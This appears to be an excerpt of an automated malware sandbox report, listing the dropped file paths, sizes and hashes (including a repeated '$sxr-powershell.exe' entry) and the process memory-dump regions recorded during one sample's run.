f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gdvuymah.xgp.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\c5b5f892-515e-4453-a73a-a05dde02712b\AgileDotNetRT64.dll
Filesize
3.0MB

MD5
e3bd88b3c3e9b33dfa72c814f8826cff

SHA1
6d220c9eb7ee695f2b9dec261941bed59cac15e4

SHA256
28e9458a43e5d86a341590eaa83d0da18c29fce81f2383d84bda484e049a1796

SHA512
fcb7e384b5bda0f810c4b6190a991bd066eedfc8fc97af9837cda1ba480385c8bc09bd703c1029f9d8d8a3eea3dbc03af97b014b4713a4ceea6ad6ae85b3b6e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\c5b5f892-515e-4453-a73a-a05dde02712b\AgileDotNetRT64.dll
Filesize
3.0MB

MD5
e3bd88b3c3e9b33dfa72c814f8826cff

SHA1
6d220c9eb7ee695f2b9dec261941bed59cac15e4

SHA256
28e9458a43e5d86a341590eaa83d0da18c29fce81f2383d84bda484e049a1796

SHA512
fcb7e384b5bda0f810c4b6190a991bd066eedfc8fc97af9837cda1ba480385c8bc09bd703c1029f9d8d8a3eea3dbc03af97b014b4713a4ceea6ad6ae85b3b6e9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
Filesize
3KB

MD5
ce1744d36c8ada7118fe5af17a58a66f

SHA1
44554737499942d95cc89cffa9cb3ae6912a1725

SHA256
5742121fa98b7201aae834f99323023f89d8d394957a3dc6e67543e148bdb341

SHA512
5100a31889e3b961c120e8df3a9ff12730f6412deb6ccf13e26430e555532abf9382c9cea2b8829351f30013b1b9deec40ec81a37c4b6930231d3cfb15eb1b77

Download Submit
C:\Users\Admin\Desktop\Microsoft Edge.lnk
Filesize
2KB

MD5
0a8a687806f0df8351bf3c231ccd5098

SHA1
9dd03beea156e22c9846f445c17d85e634c10ae0

SHA256
43fcb2355603db939f3a586323a524f95ea35ae225d7c85b886546b624333eb7

SHA512
8c6ebf5bbd1c4fed2de0812285b8d10ffd4df346d64bb6423339a431b1d647e7b9a2c0a0acc3319428f5500b6aae800fed72964eeee16d859fe039525a627972

Download Submit
C:\Users\Admin\Downloads\5446a821-87f3-4e34-a370-a1ab21bca786.tmp
Filesize
17.1MB

MD5
63b85800ccd2e8b6d071434861b8c664

SHA1
1f10d91e4dccdc1eaf2ab2d5a0b6627d7b184165

SHA256
895b961c32fb9fbfbcd231fbae466fc29384cc07f2d52c88d80b58673d82aa79

SHA512
83a765d717162dbd505b3a03fe5e19bad4bb1e830e322af689725a6f4e493cc90cd4fdfd24e0c2887ed5b9823a3fc7288d048e8222c9d9a48b4c26b5fb25ae82

Download Submit
C:\Windows\$sxr-powershell.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\System32\ucrtbased.dll
Filesize
1.8MB

MD5
7873612dddd9152d70d892427bc45ef0

SHA1
ab9079a43a784471ca31c4f0a34b698d99334dfa

SHA256
203d10b0deaea87d5687d362ba925289a13e52b5df55b9de58ba534290af27bf

SHA512
d988e9ff11017465b019cf3b599ef7597d2c44fc37cbee9e846dee51990ca5dc45942cc183d9d25c1dfd84f33f922c2ceead6efc1ead19e8eecb509dfb78a083

Download Submit
C:\Windows\System32\vcruntime140_1d.dll
Filesize
52KB

MD5
9ef28981adcbf4360de5f11b8f4ecff9

SHA1
219aaa1a617b1dfa36f3928bd1020e410666134f

SHA256
8caaca1bfc909fcb972ceade7be7b80b5855a4621562ee32a10c9903b616d49a

SHA512
ef7f0b25fae749e6134269683f973fef37dfa1969fa4fa0567378ada073c36da4feb17b62d3282c443f4d3ba8b4aeb39063c607c848ade095880d981141adb9c

Download Submit
\??\pipe\LOCAL\crashpad_5084_RJTWZVJMXYMAYFOE
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/316-993-0x00007FFED7430000-0x00007FFED7440000-memory.dmp

Filesize
64KB

Download
memory/316-990-0x00000297B5650000-0x00000297B5677000-memory.dmp

Filesize
156KB

Download
memory/316-1013-0x00000297B5650000-0x00000297B5677000-memory.dmp

Filesize
156KB

Download
memory/608-1008-0x0000019EE9BD0000-0x0000019EE9BF7000-memory.dmp

Filesize
156KB

Download
memory/608-975-0x0000019EE9BD0000-0x0000019EE9BF7000-memory.dmp

Filesize
156KB

Download
memory/608-978-0x00007FFED7430000-0x00007FFED7440000-memory.dmp

Filesize
64KB

Download
memory/608-973-0x0000019EE9B40000-0x0000019EE9B61000-memory.dmp

Filesize
132KB

Download
memory/640-788-0x00007FFF173B0000-0x00007FFF175A5000-memory.dmp

Filesize
2.0MB

Download
memory/640-988-0x00007FFF173B0000-0x00007FFF175A5000-memory.dmp

Filesize
2.0MB

Download
memory/640-780-0x0000019A247F0000-0x0000019A24800000-memory.dmp

Filesize
64KB

Download
memory/640-790-0x00007FFF173B0000-0x00007FFF175A5000-memory.dmp

Filesize
2.0MB

Download
memory/640-789-0x00007FFF15400000-0x00007FFF154BE000-memory.dmp

Filesize
760KB

Download
memory/640-781-0x0000019A247F0000-0x0000019A24800000-memory.dmp

Filesize
64KB

Download
memory/640-784-0x0000019A247F0000-0x0000019A24800000-memory.dmp

Filesize
64KB

Download
memory/640-991-0x00007FFF15400000-0x00007FFF154BE000-memory.dmp

Filesize
760KB

Download
memory/640-783-0x0000019A247F0000-0x0000019A24800000-memory.dmp

Filesize
64KB

Download
memory/640-779-0x0000019A247F0000-0x0000019A24800000-memory.dmp

Filesize
64KB

Download
memory/652-1027-0x0000015251F60000-0x0000015251F87000-memory.dmp

Filesize
156KB

Download
memory/652-1012-0x0000015251F60000-0x0000015251F87000-memory.dmp

Filesize
156KB

Download
memory/664-1010-0x000001CBFB050000-0x000001CBFB077000-memory.dmp

Filesize
156KB

Download
memory/664-976-0x000001CBFB050000-0x000001CBFB077000-memory.dmp

Filesize
156KB

Download
memory/664-979-0x00007FFED7430000-0x00007FFED7440000-memory.dmp

Filesize
64KB

Download
memory/732-1022-0x00000266D2940000-0x00000266D2967000-memory.dmp

Filesize
156KB

Download
memory/732-1000-0x00007FFED7430000-0x00007FFED7440000-memory.dmp

Filesize
64KB

Download
memory/732-997-0x00000266D2940000-0x00000266D2967000-memory.dmp

Filesize
156KB

Download
memory/960-1017-0x000002184A1E0000-0x000002184A207000-memory.dmp

Filesize
156KB

Download
memory/960-992-0x000002184A1E0000-0x000002184A207000-memory.dmp

Filesize
156KB

Download
memory/960-995-0x00007FFED7430000-0x00007FFED7440000-memory.dmp

Filesize
64KB

Download
memory/1064-1014-0x000002B9A78B0000-0x000002B9A78D7000-memory.dmp

Filesize
156KB

Download
memory/1064-1033-0x000002B9A78B0000-0x000002B9A78D7000-memory.dmp

Filesize
156KB

Download
memory/1072-1037-0x00000269E7F90000-0x00000269E7FB7000-memory.dmp

Filesize
156KB

Download
memory/1156-1043-0x000001E1473A0000-0x000001E1473C7000-memory.dmp

Filesize
156KB

Download
memory/1192-1047-0x000002AFBB970000-0x000002AFBB997000-memory.dmp

Filesize
156KB

Download
memory/1304-1052-0x00000162D22B0000-0x00000162D22D7000-memory.dmp

Filesize
156KB

Download
memory/1332-1056-0x00000146AD940000-0x00000146AD967000-memory.dmp

Filesize
156KB

Download
memory/1496-1062-0x0000029983BD0000-0x0000029983BF7000-memory.dmp

Filesize
156KB

Download
memory/1552-1067-0x000001A62DF30000-0x000001A62DF57000-memory.dmp

Filesize
156KB

Download
memory/1564-968-0x00007FFF15400000-0x00007FFF154BE000-memory.dmp

Filesize
760KB

Download
memory/1564-956-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/1564-959-0x00007FFF173B0000-0x00007FFF175A5000-memory.dmp

Filesize
2.0MB

Download
memory/1564-969-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/1564-958-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/2280-941-0x000002234B9B0000-0x000002234B9C0000-memory.dmp

Filesize
64KB

Download
memory/2280-939-0x000002234B9B0000-0x000002234B9C0000-memory.dmp

Filesize
64KB

Download
memory/2880-936-0x00000188A95E0000-0x00000188A95F0000-memory.dmp

Filesize
64KB

Download
memory/3232-145-0x0000011DFB0D0000-0x0000011DFB0E0000-memory.dmp

Filesize
64KB

Download
memory/3232-133-0x0000011DFB070000-0x0000011DFB092000-memory.dmp

Filesize
136KB

Download
memory/3232-144-0x0000011DFB0D0000-0x0000011DFB0E0000-memory.dmp

Filesize
64KB

Download
memory/3232-143-0x0000011DFB0D0000-0x0000011DFB0E0000-memory.dmp

Filesize
64KB

Download
memory/3380-938-0x00000187CEEC0000-0x00000187CEED0000-memory.dmp

Filesize
64KB

Download
memory/3380-937-0x00000187CEEC0000-0x00000187CEED0000-memory.dmp

Filesize
64KB

Download
memory/3792-943-0x0000028BB3B20000-0x0000028BB3B30000-memory.dmp

Filesize
64KB

Download
memory/3792-971-0x0000028BB3B20000-0x0000028BB3B30000-memory.dmp

Filesize
64KB

Download
memory/3976-880-0x0000013298460000-0x0000013298470000-memory.dmp

Filesize
64KB

Download
memory/3976-882-0x0000013298460000-0x0000013298470000-memory.dmp

Filesize
64KB

Download
memory/4472-794-0x0000000140000000-0x0000000140004000-memory.dmp

Filesize
16KB

Download
memory/4472-792-0x0000000140000000-0x0000000140004000-memory.dmp

Filesize
16KB

Download
memory/5220-876-0x0000022C26B70000-0x0000022C26B80000-memory.dmp

Filesize
64KB

Download
memory/5476-757-0x0000022FAAF80000-0x0000022FAAF90000-memory.dmp

Filesize
64KB

Download
memory/5476-998-0x00007FFEF0F60000-0x00007FFEF17BF000-memory.dmp

Filesize
8.4MB

Download
memory/5476-980-0x00007FFEF0F60000-0x00007FFEF17BF000-memory.dmp

Filesize
8.4MB

Download
memory/5476-750-0x0000022FA8330000-0x0000022FA947A000-memory.dmp

Filesize
17.3MB

Download
memory/5476-758-0x00007FFEF0F60000-0x00007FFEF17BF000-memory.dmp

Filesize
8.4MB

Download
memory/5476-759-0x00007FFEF0F60000-0x00007FFEF17BF000-memory.dmp

Filesize
8.4MB

Download
memory/5476-760-0x00007FFEF86E0000-0x00007FFEF882E000-memory.dmp

Filesize
1.3MB

Download
memory/5476-824-0x0000022FAAF80000-0x0000022FAAF90000-memory.dmp

Filesize
64KB

Download
memory/5476-761-0x0000022FAAFC0000-0x0000022FAAFD8000-memory.dmp

Filesize
96KB

Download
memory/5476-786-0x00007FFEF0F60000-0x00007FFEF17BF000-memory.dmp

Filesize
8.4MB

Download
memory/5476-764-0x00007FFEF0F60000-0x00007FFEF17BF000-memory.dmp

Filesize
8.4MB

Download
memory/5476-782-0x00007FFEF0F60000-0x00007FFEF17BF000-memory.dmp

Filesize
8.4MB

Download
memory/5476-785-0x0000022FAAF80000-0x0000022FAAF90000-memory.dmp

Filesize
64KB

Download
memory/5476-827-0x00007FFEF0F60000-0x00007FFEF17BF000-memory.dmp

Filesize
8.4MB

Download
memory/5504-830-0x0000024DE61E0000-0x0000024DE61F0000-memory.dmp

Filesize
64KB

Download
memory/5504-875-0x0000024DE61E0000-0x0000024DE61F0000-memory.dmp

Filesize
64KB

Download
memory/5828-877-0x000002A297310000-0x000002A297320000-memory.dmp

Filesize
64KB

Download
memory/5828-878-0x000002A297310000-0x000002A297320000-memory.dmp

Filesize
64KB

Download
memory/6384-826-0x00007FFF15400000-0x00007FFF154BE000-memory.dmp

Filesize
760KB

Download
memory/6384-1039-0x000001F2F7000000-0x000001F2F703C000-memory.dmp

Filesize
240KB

Download
memory/6384-817-0x000001F2F4AE0000-0x000001F2F4AF0000-memory.dmp

Filesize
64KB

Download
memory/6384-1032-0x000001F2F6990000-0x000001F2F69A2000-memory.dmp

Filesize
72KB

Download
memory/6384-825-0x00007FFF173B0000-0x00007FFF175A5000-memory.dmp

Filesize
2.0MB

Download
memory/6384-820-0x00007FFF15400000-0x00007FFF154BE000-memory.dmp

Filesize
760KB

Download
memory/6384-1005-0x000001F2F4AE0000-0x000001F2F4AF0000-memory.dmp

Filesize
64KB

Download
memory/6384-818-0x000001F2F4AE0000-0x000001F2F4AF0000-memory.dmp

Filesize
64KB

Download
memory/6384-994-0x000001F2F4AE0000-0x000001F2F4AF0000-memory.dmp

Filesize
64KB

Download
memory/6384-954-0x00007FFF173B0000-0x00007FFF175A5000-memory.dmp

Filesize
2.0MB

Download
memory/6384-819-0x00007FFF173B0000-0x00007FFF175A5000-memory.dmp

Filesize
2.0MB

Download
memory/6384-940-0x000001F2F65C0000-0x000001F2F6610000-memory.dmp

Filesize
320KB

Download
memory/6384-942-0x000001F2F66D0000-0x000001F2F6782000-memory.dmp

Filesize
712KB

Download
memory/6384-944-0x000001F2F6CF0000-0x000001F2F6EB2000-memory.dmp

Filesize
1.8MB

Download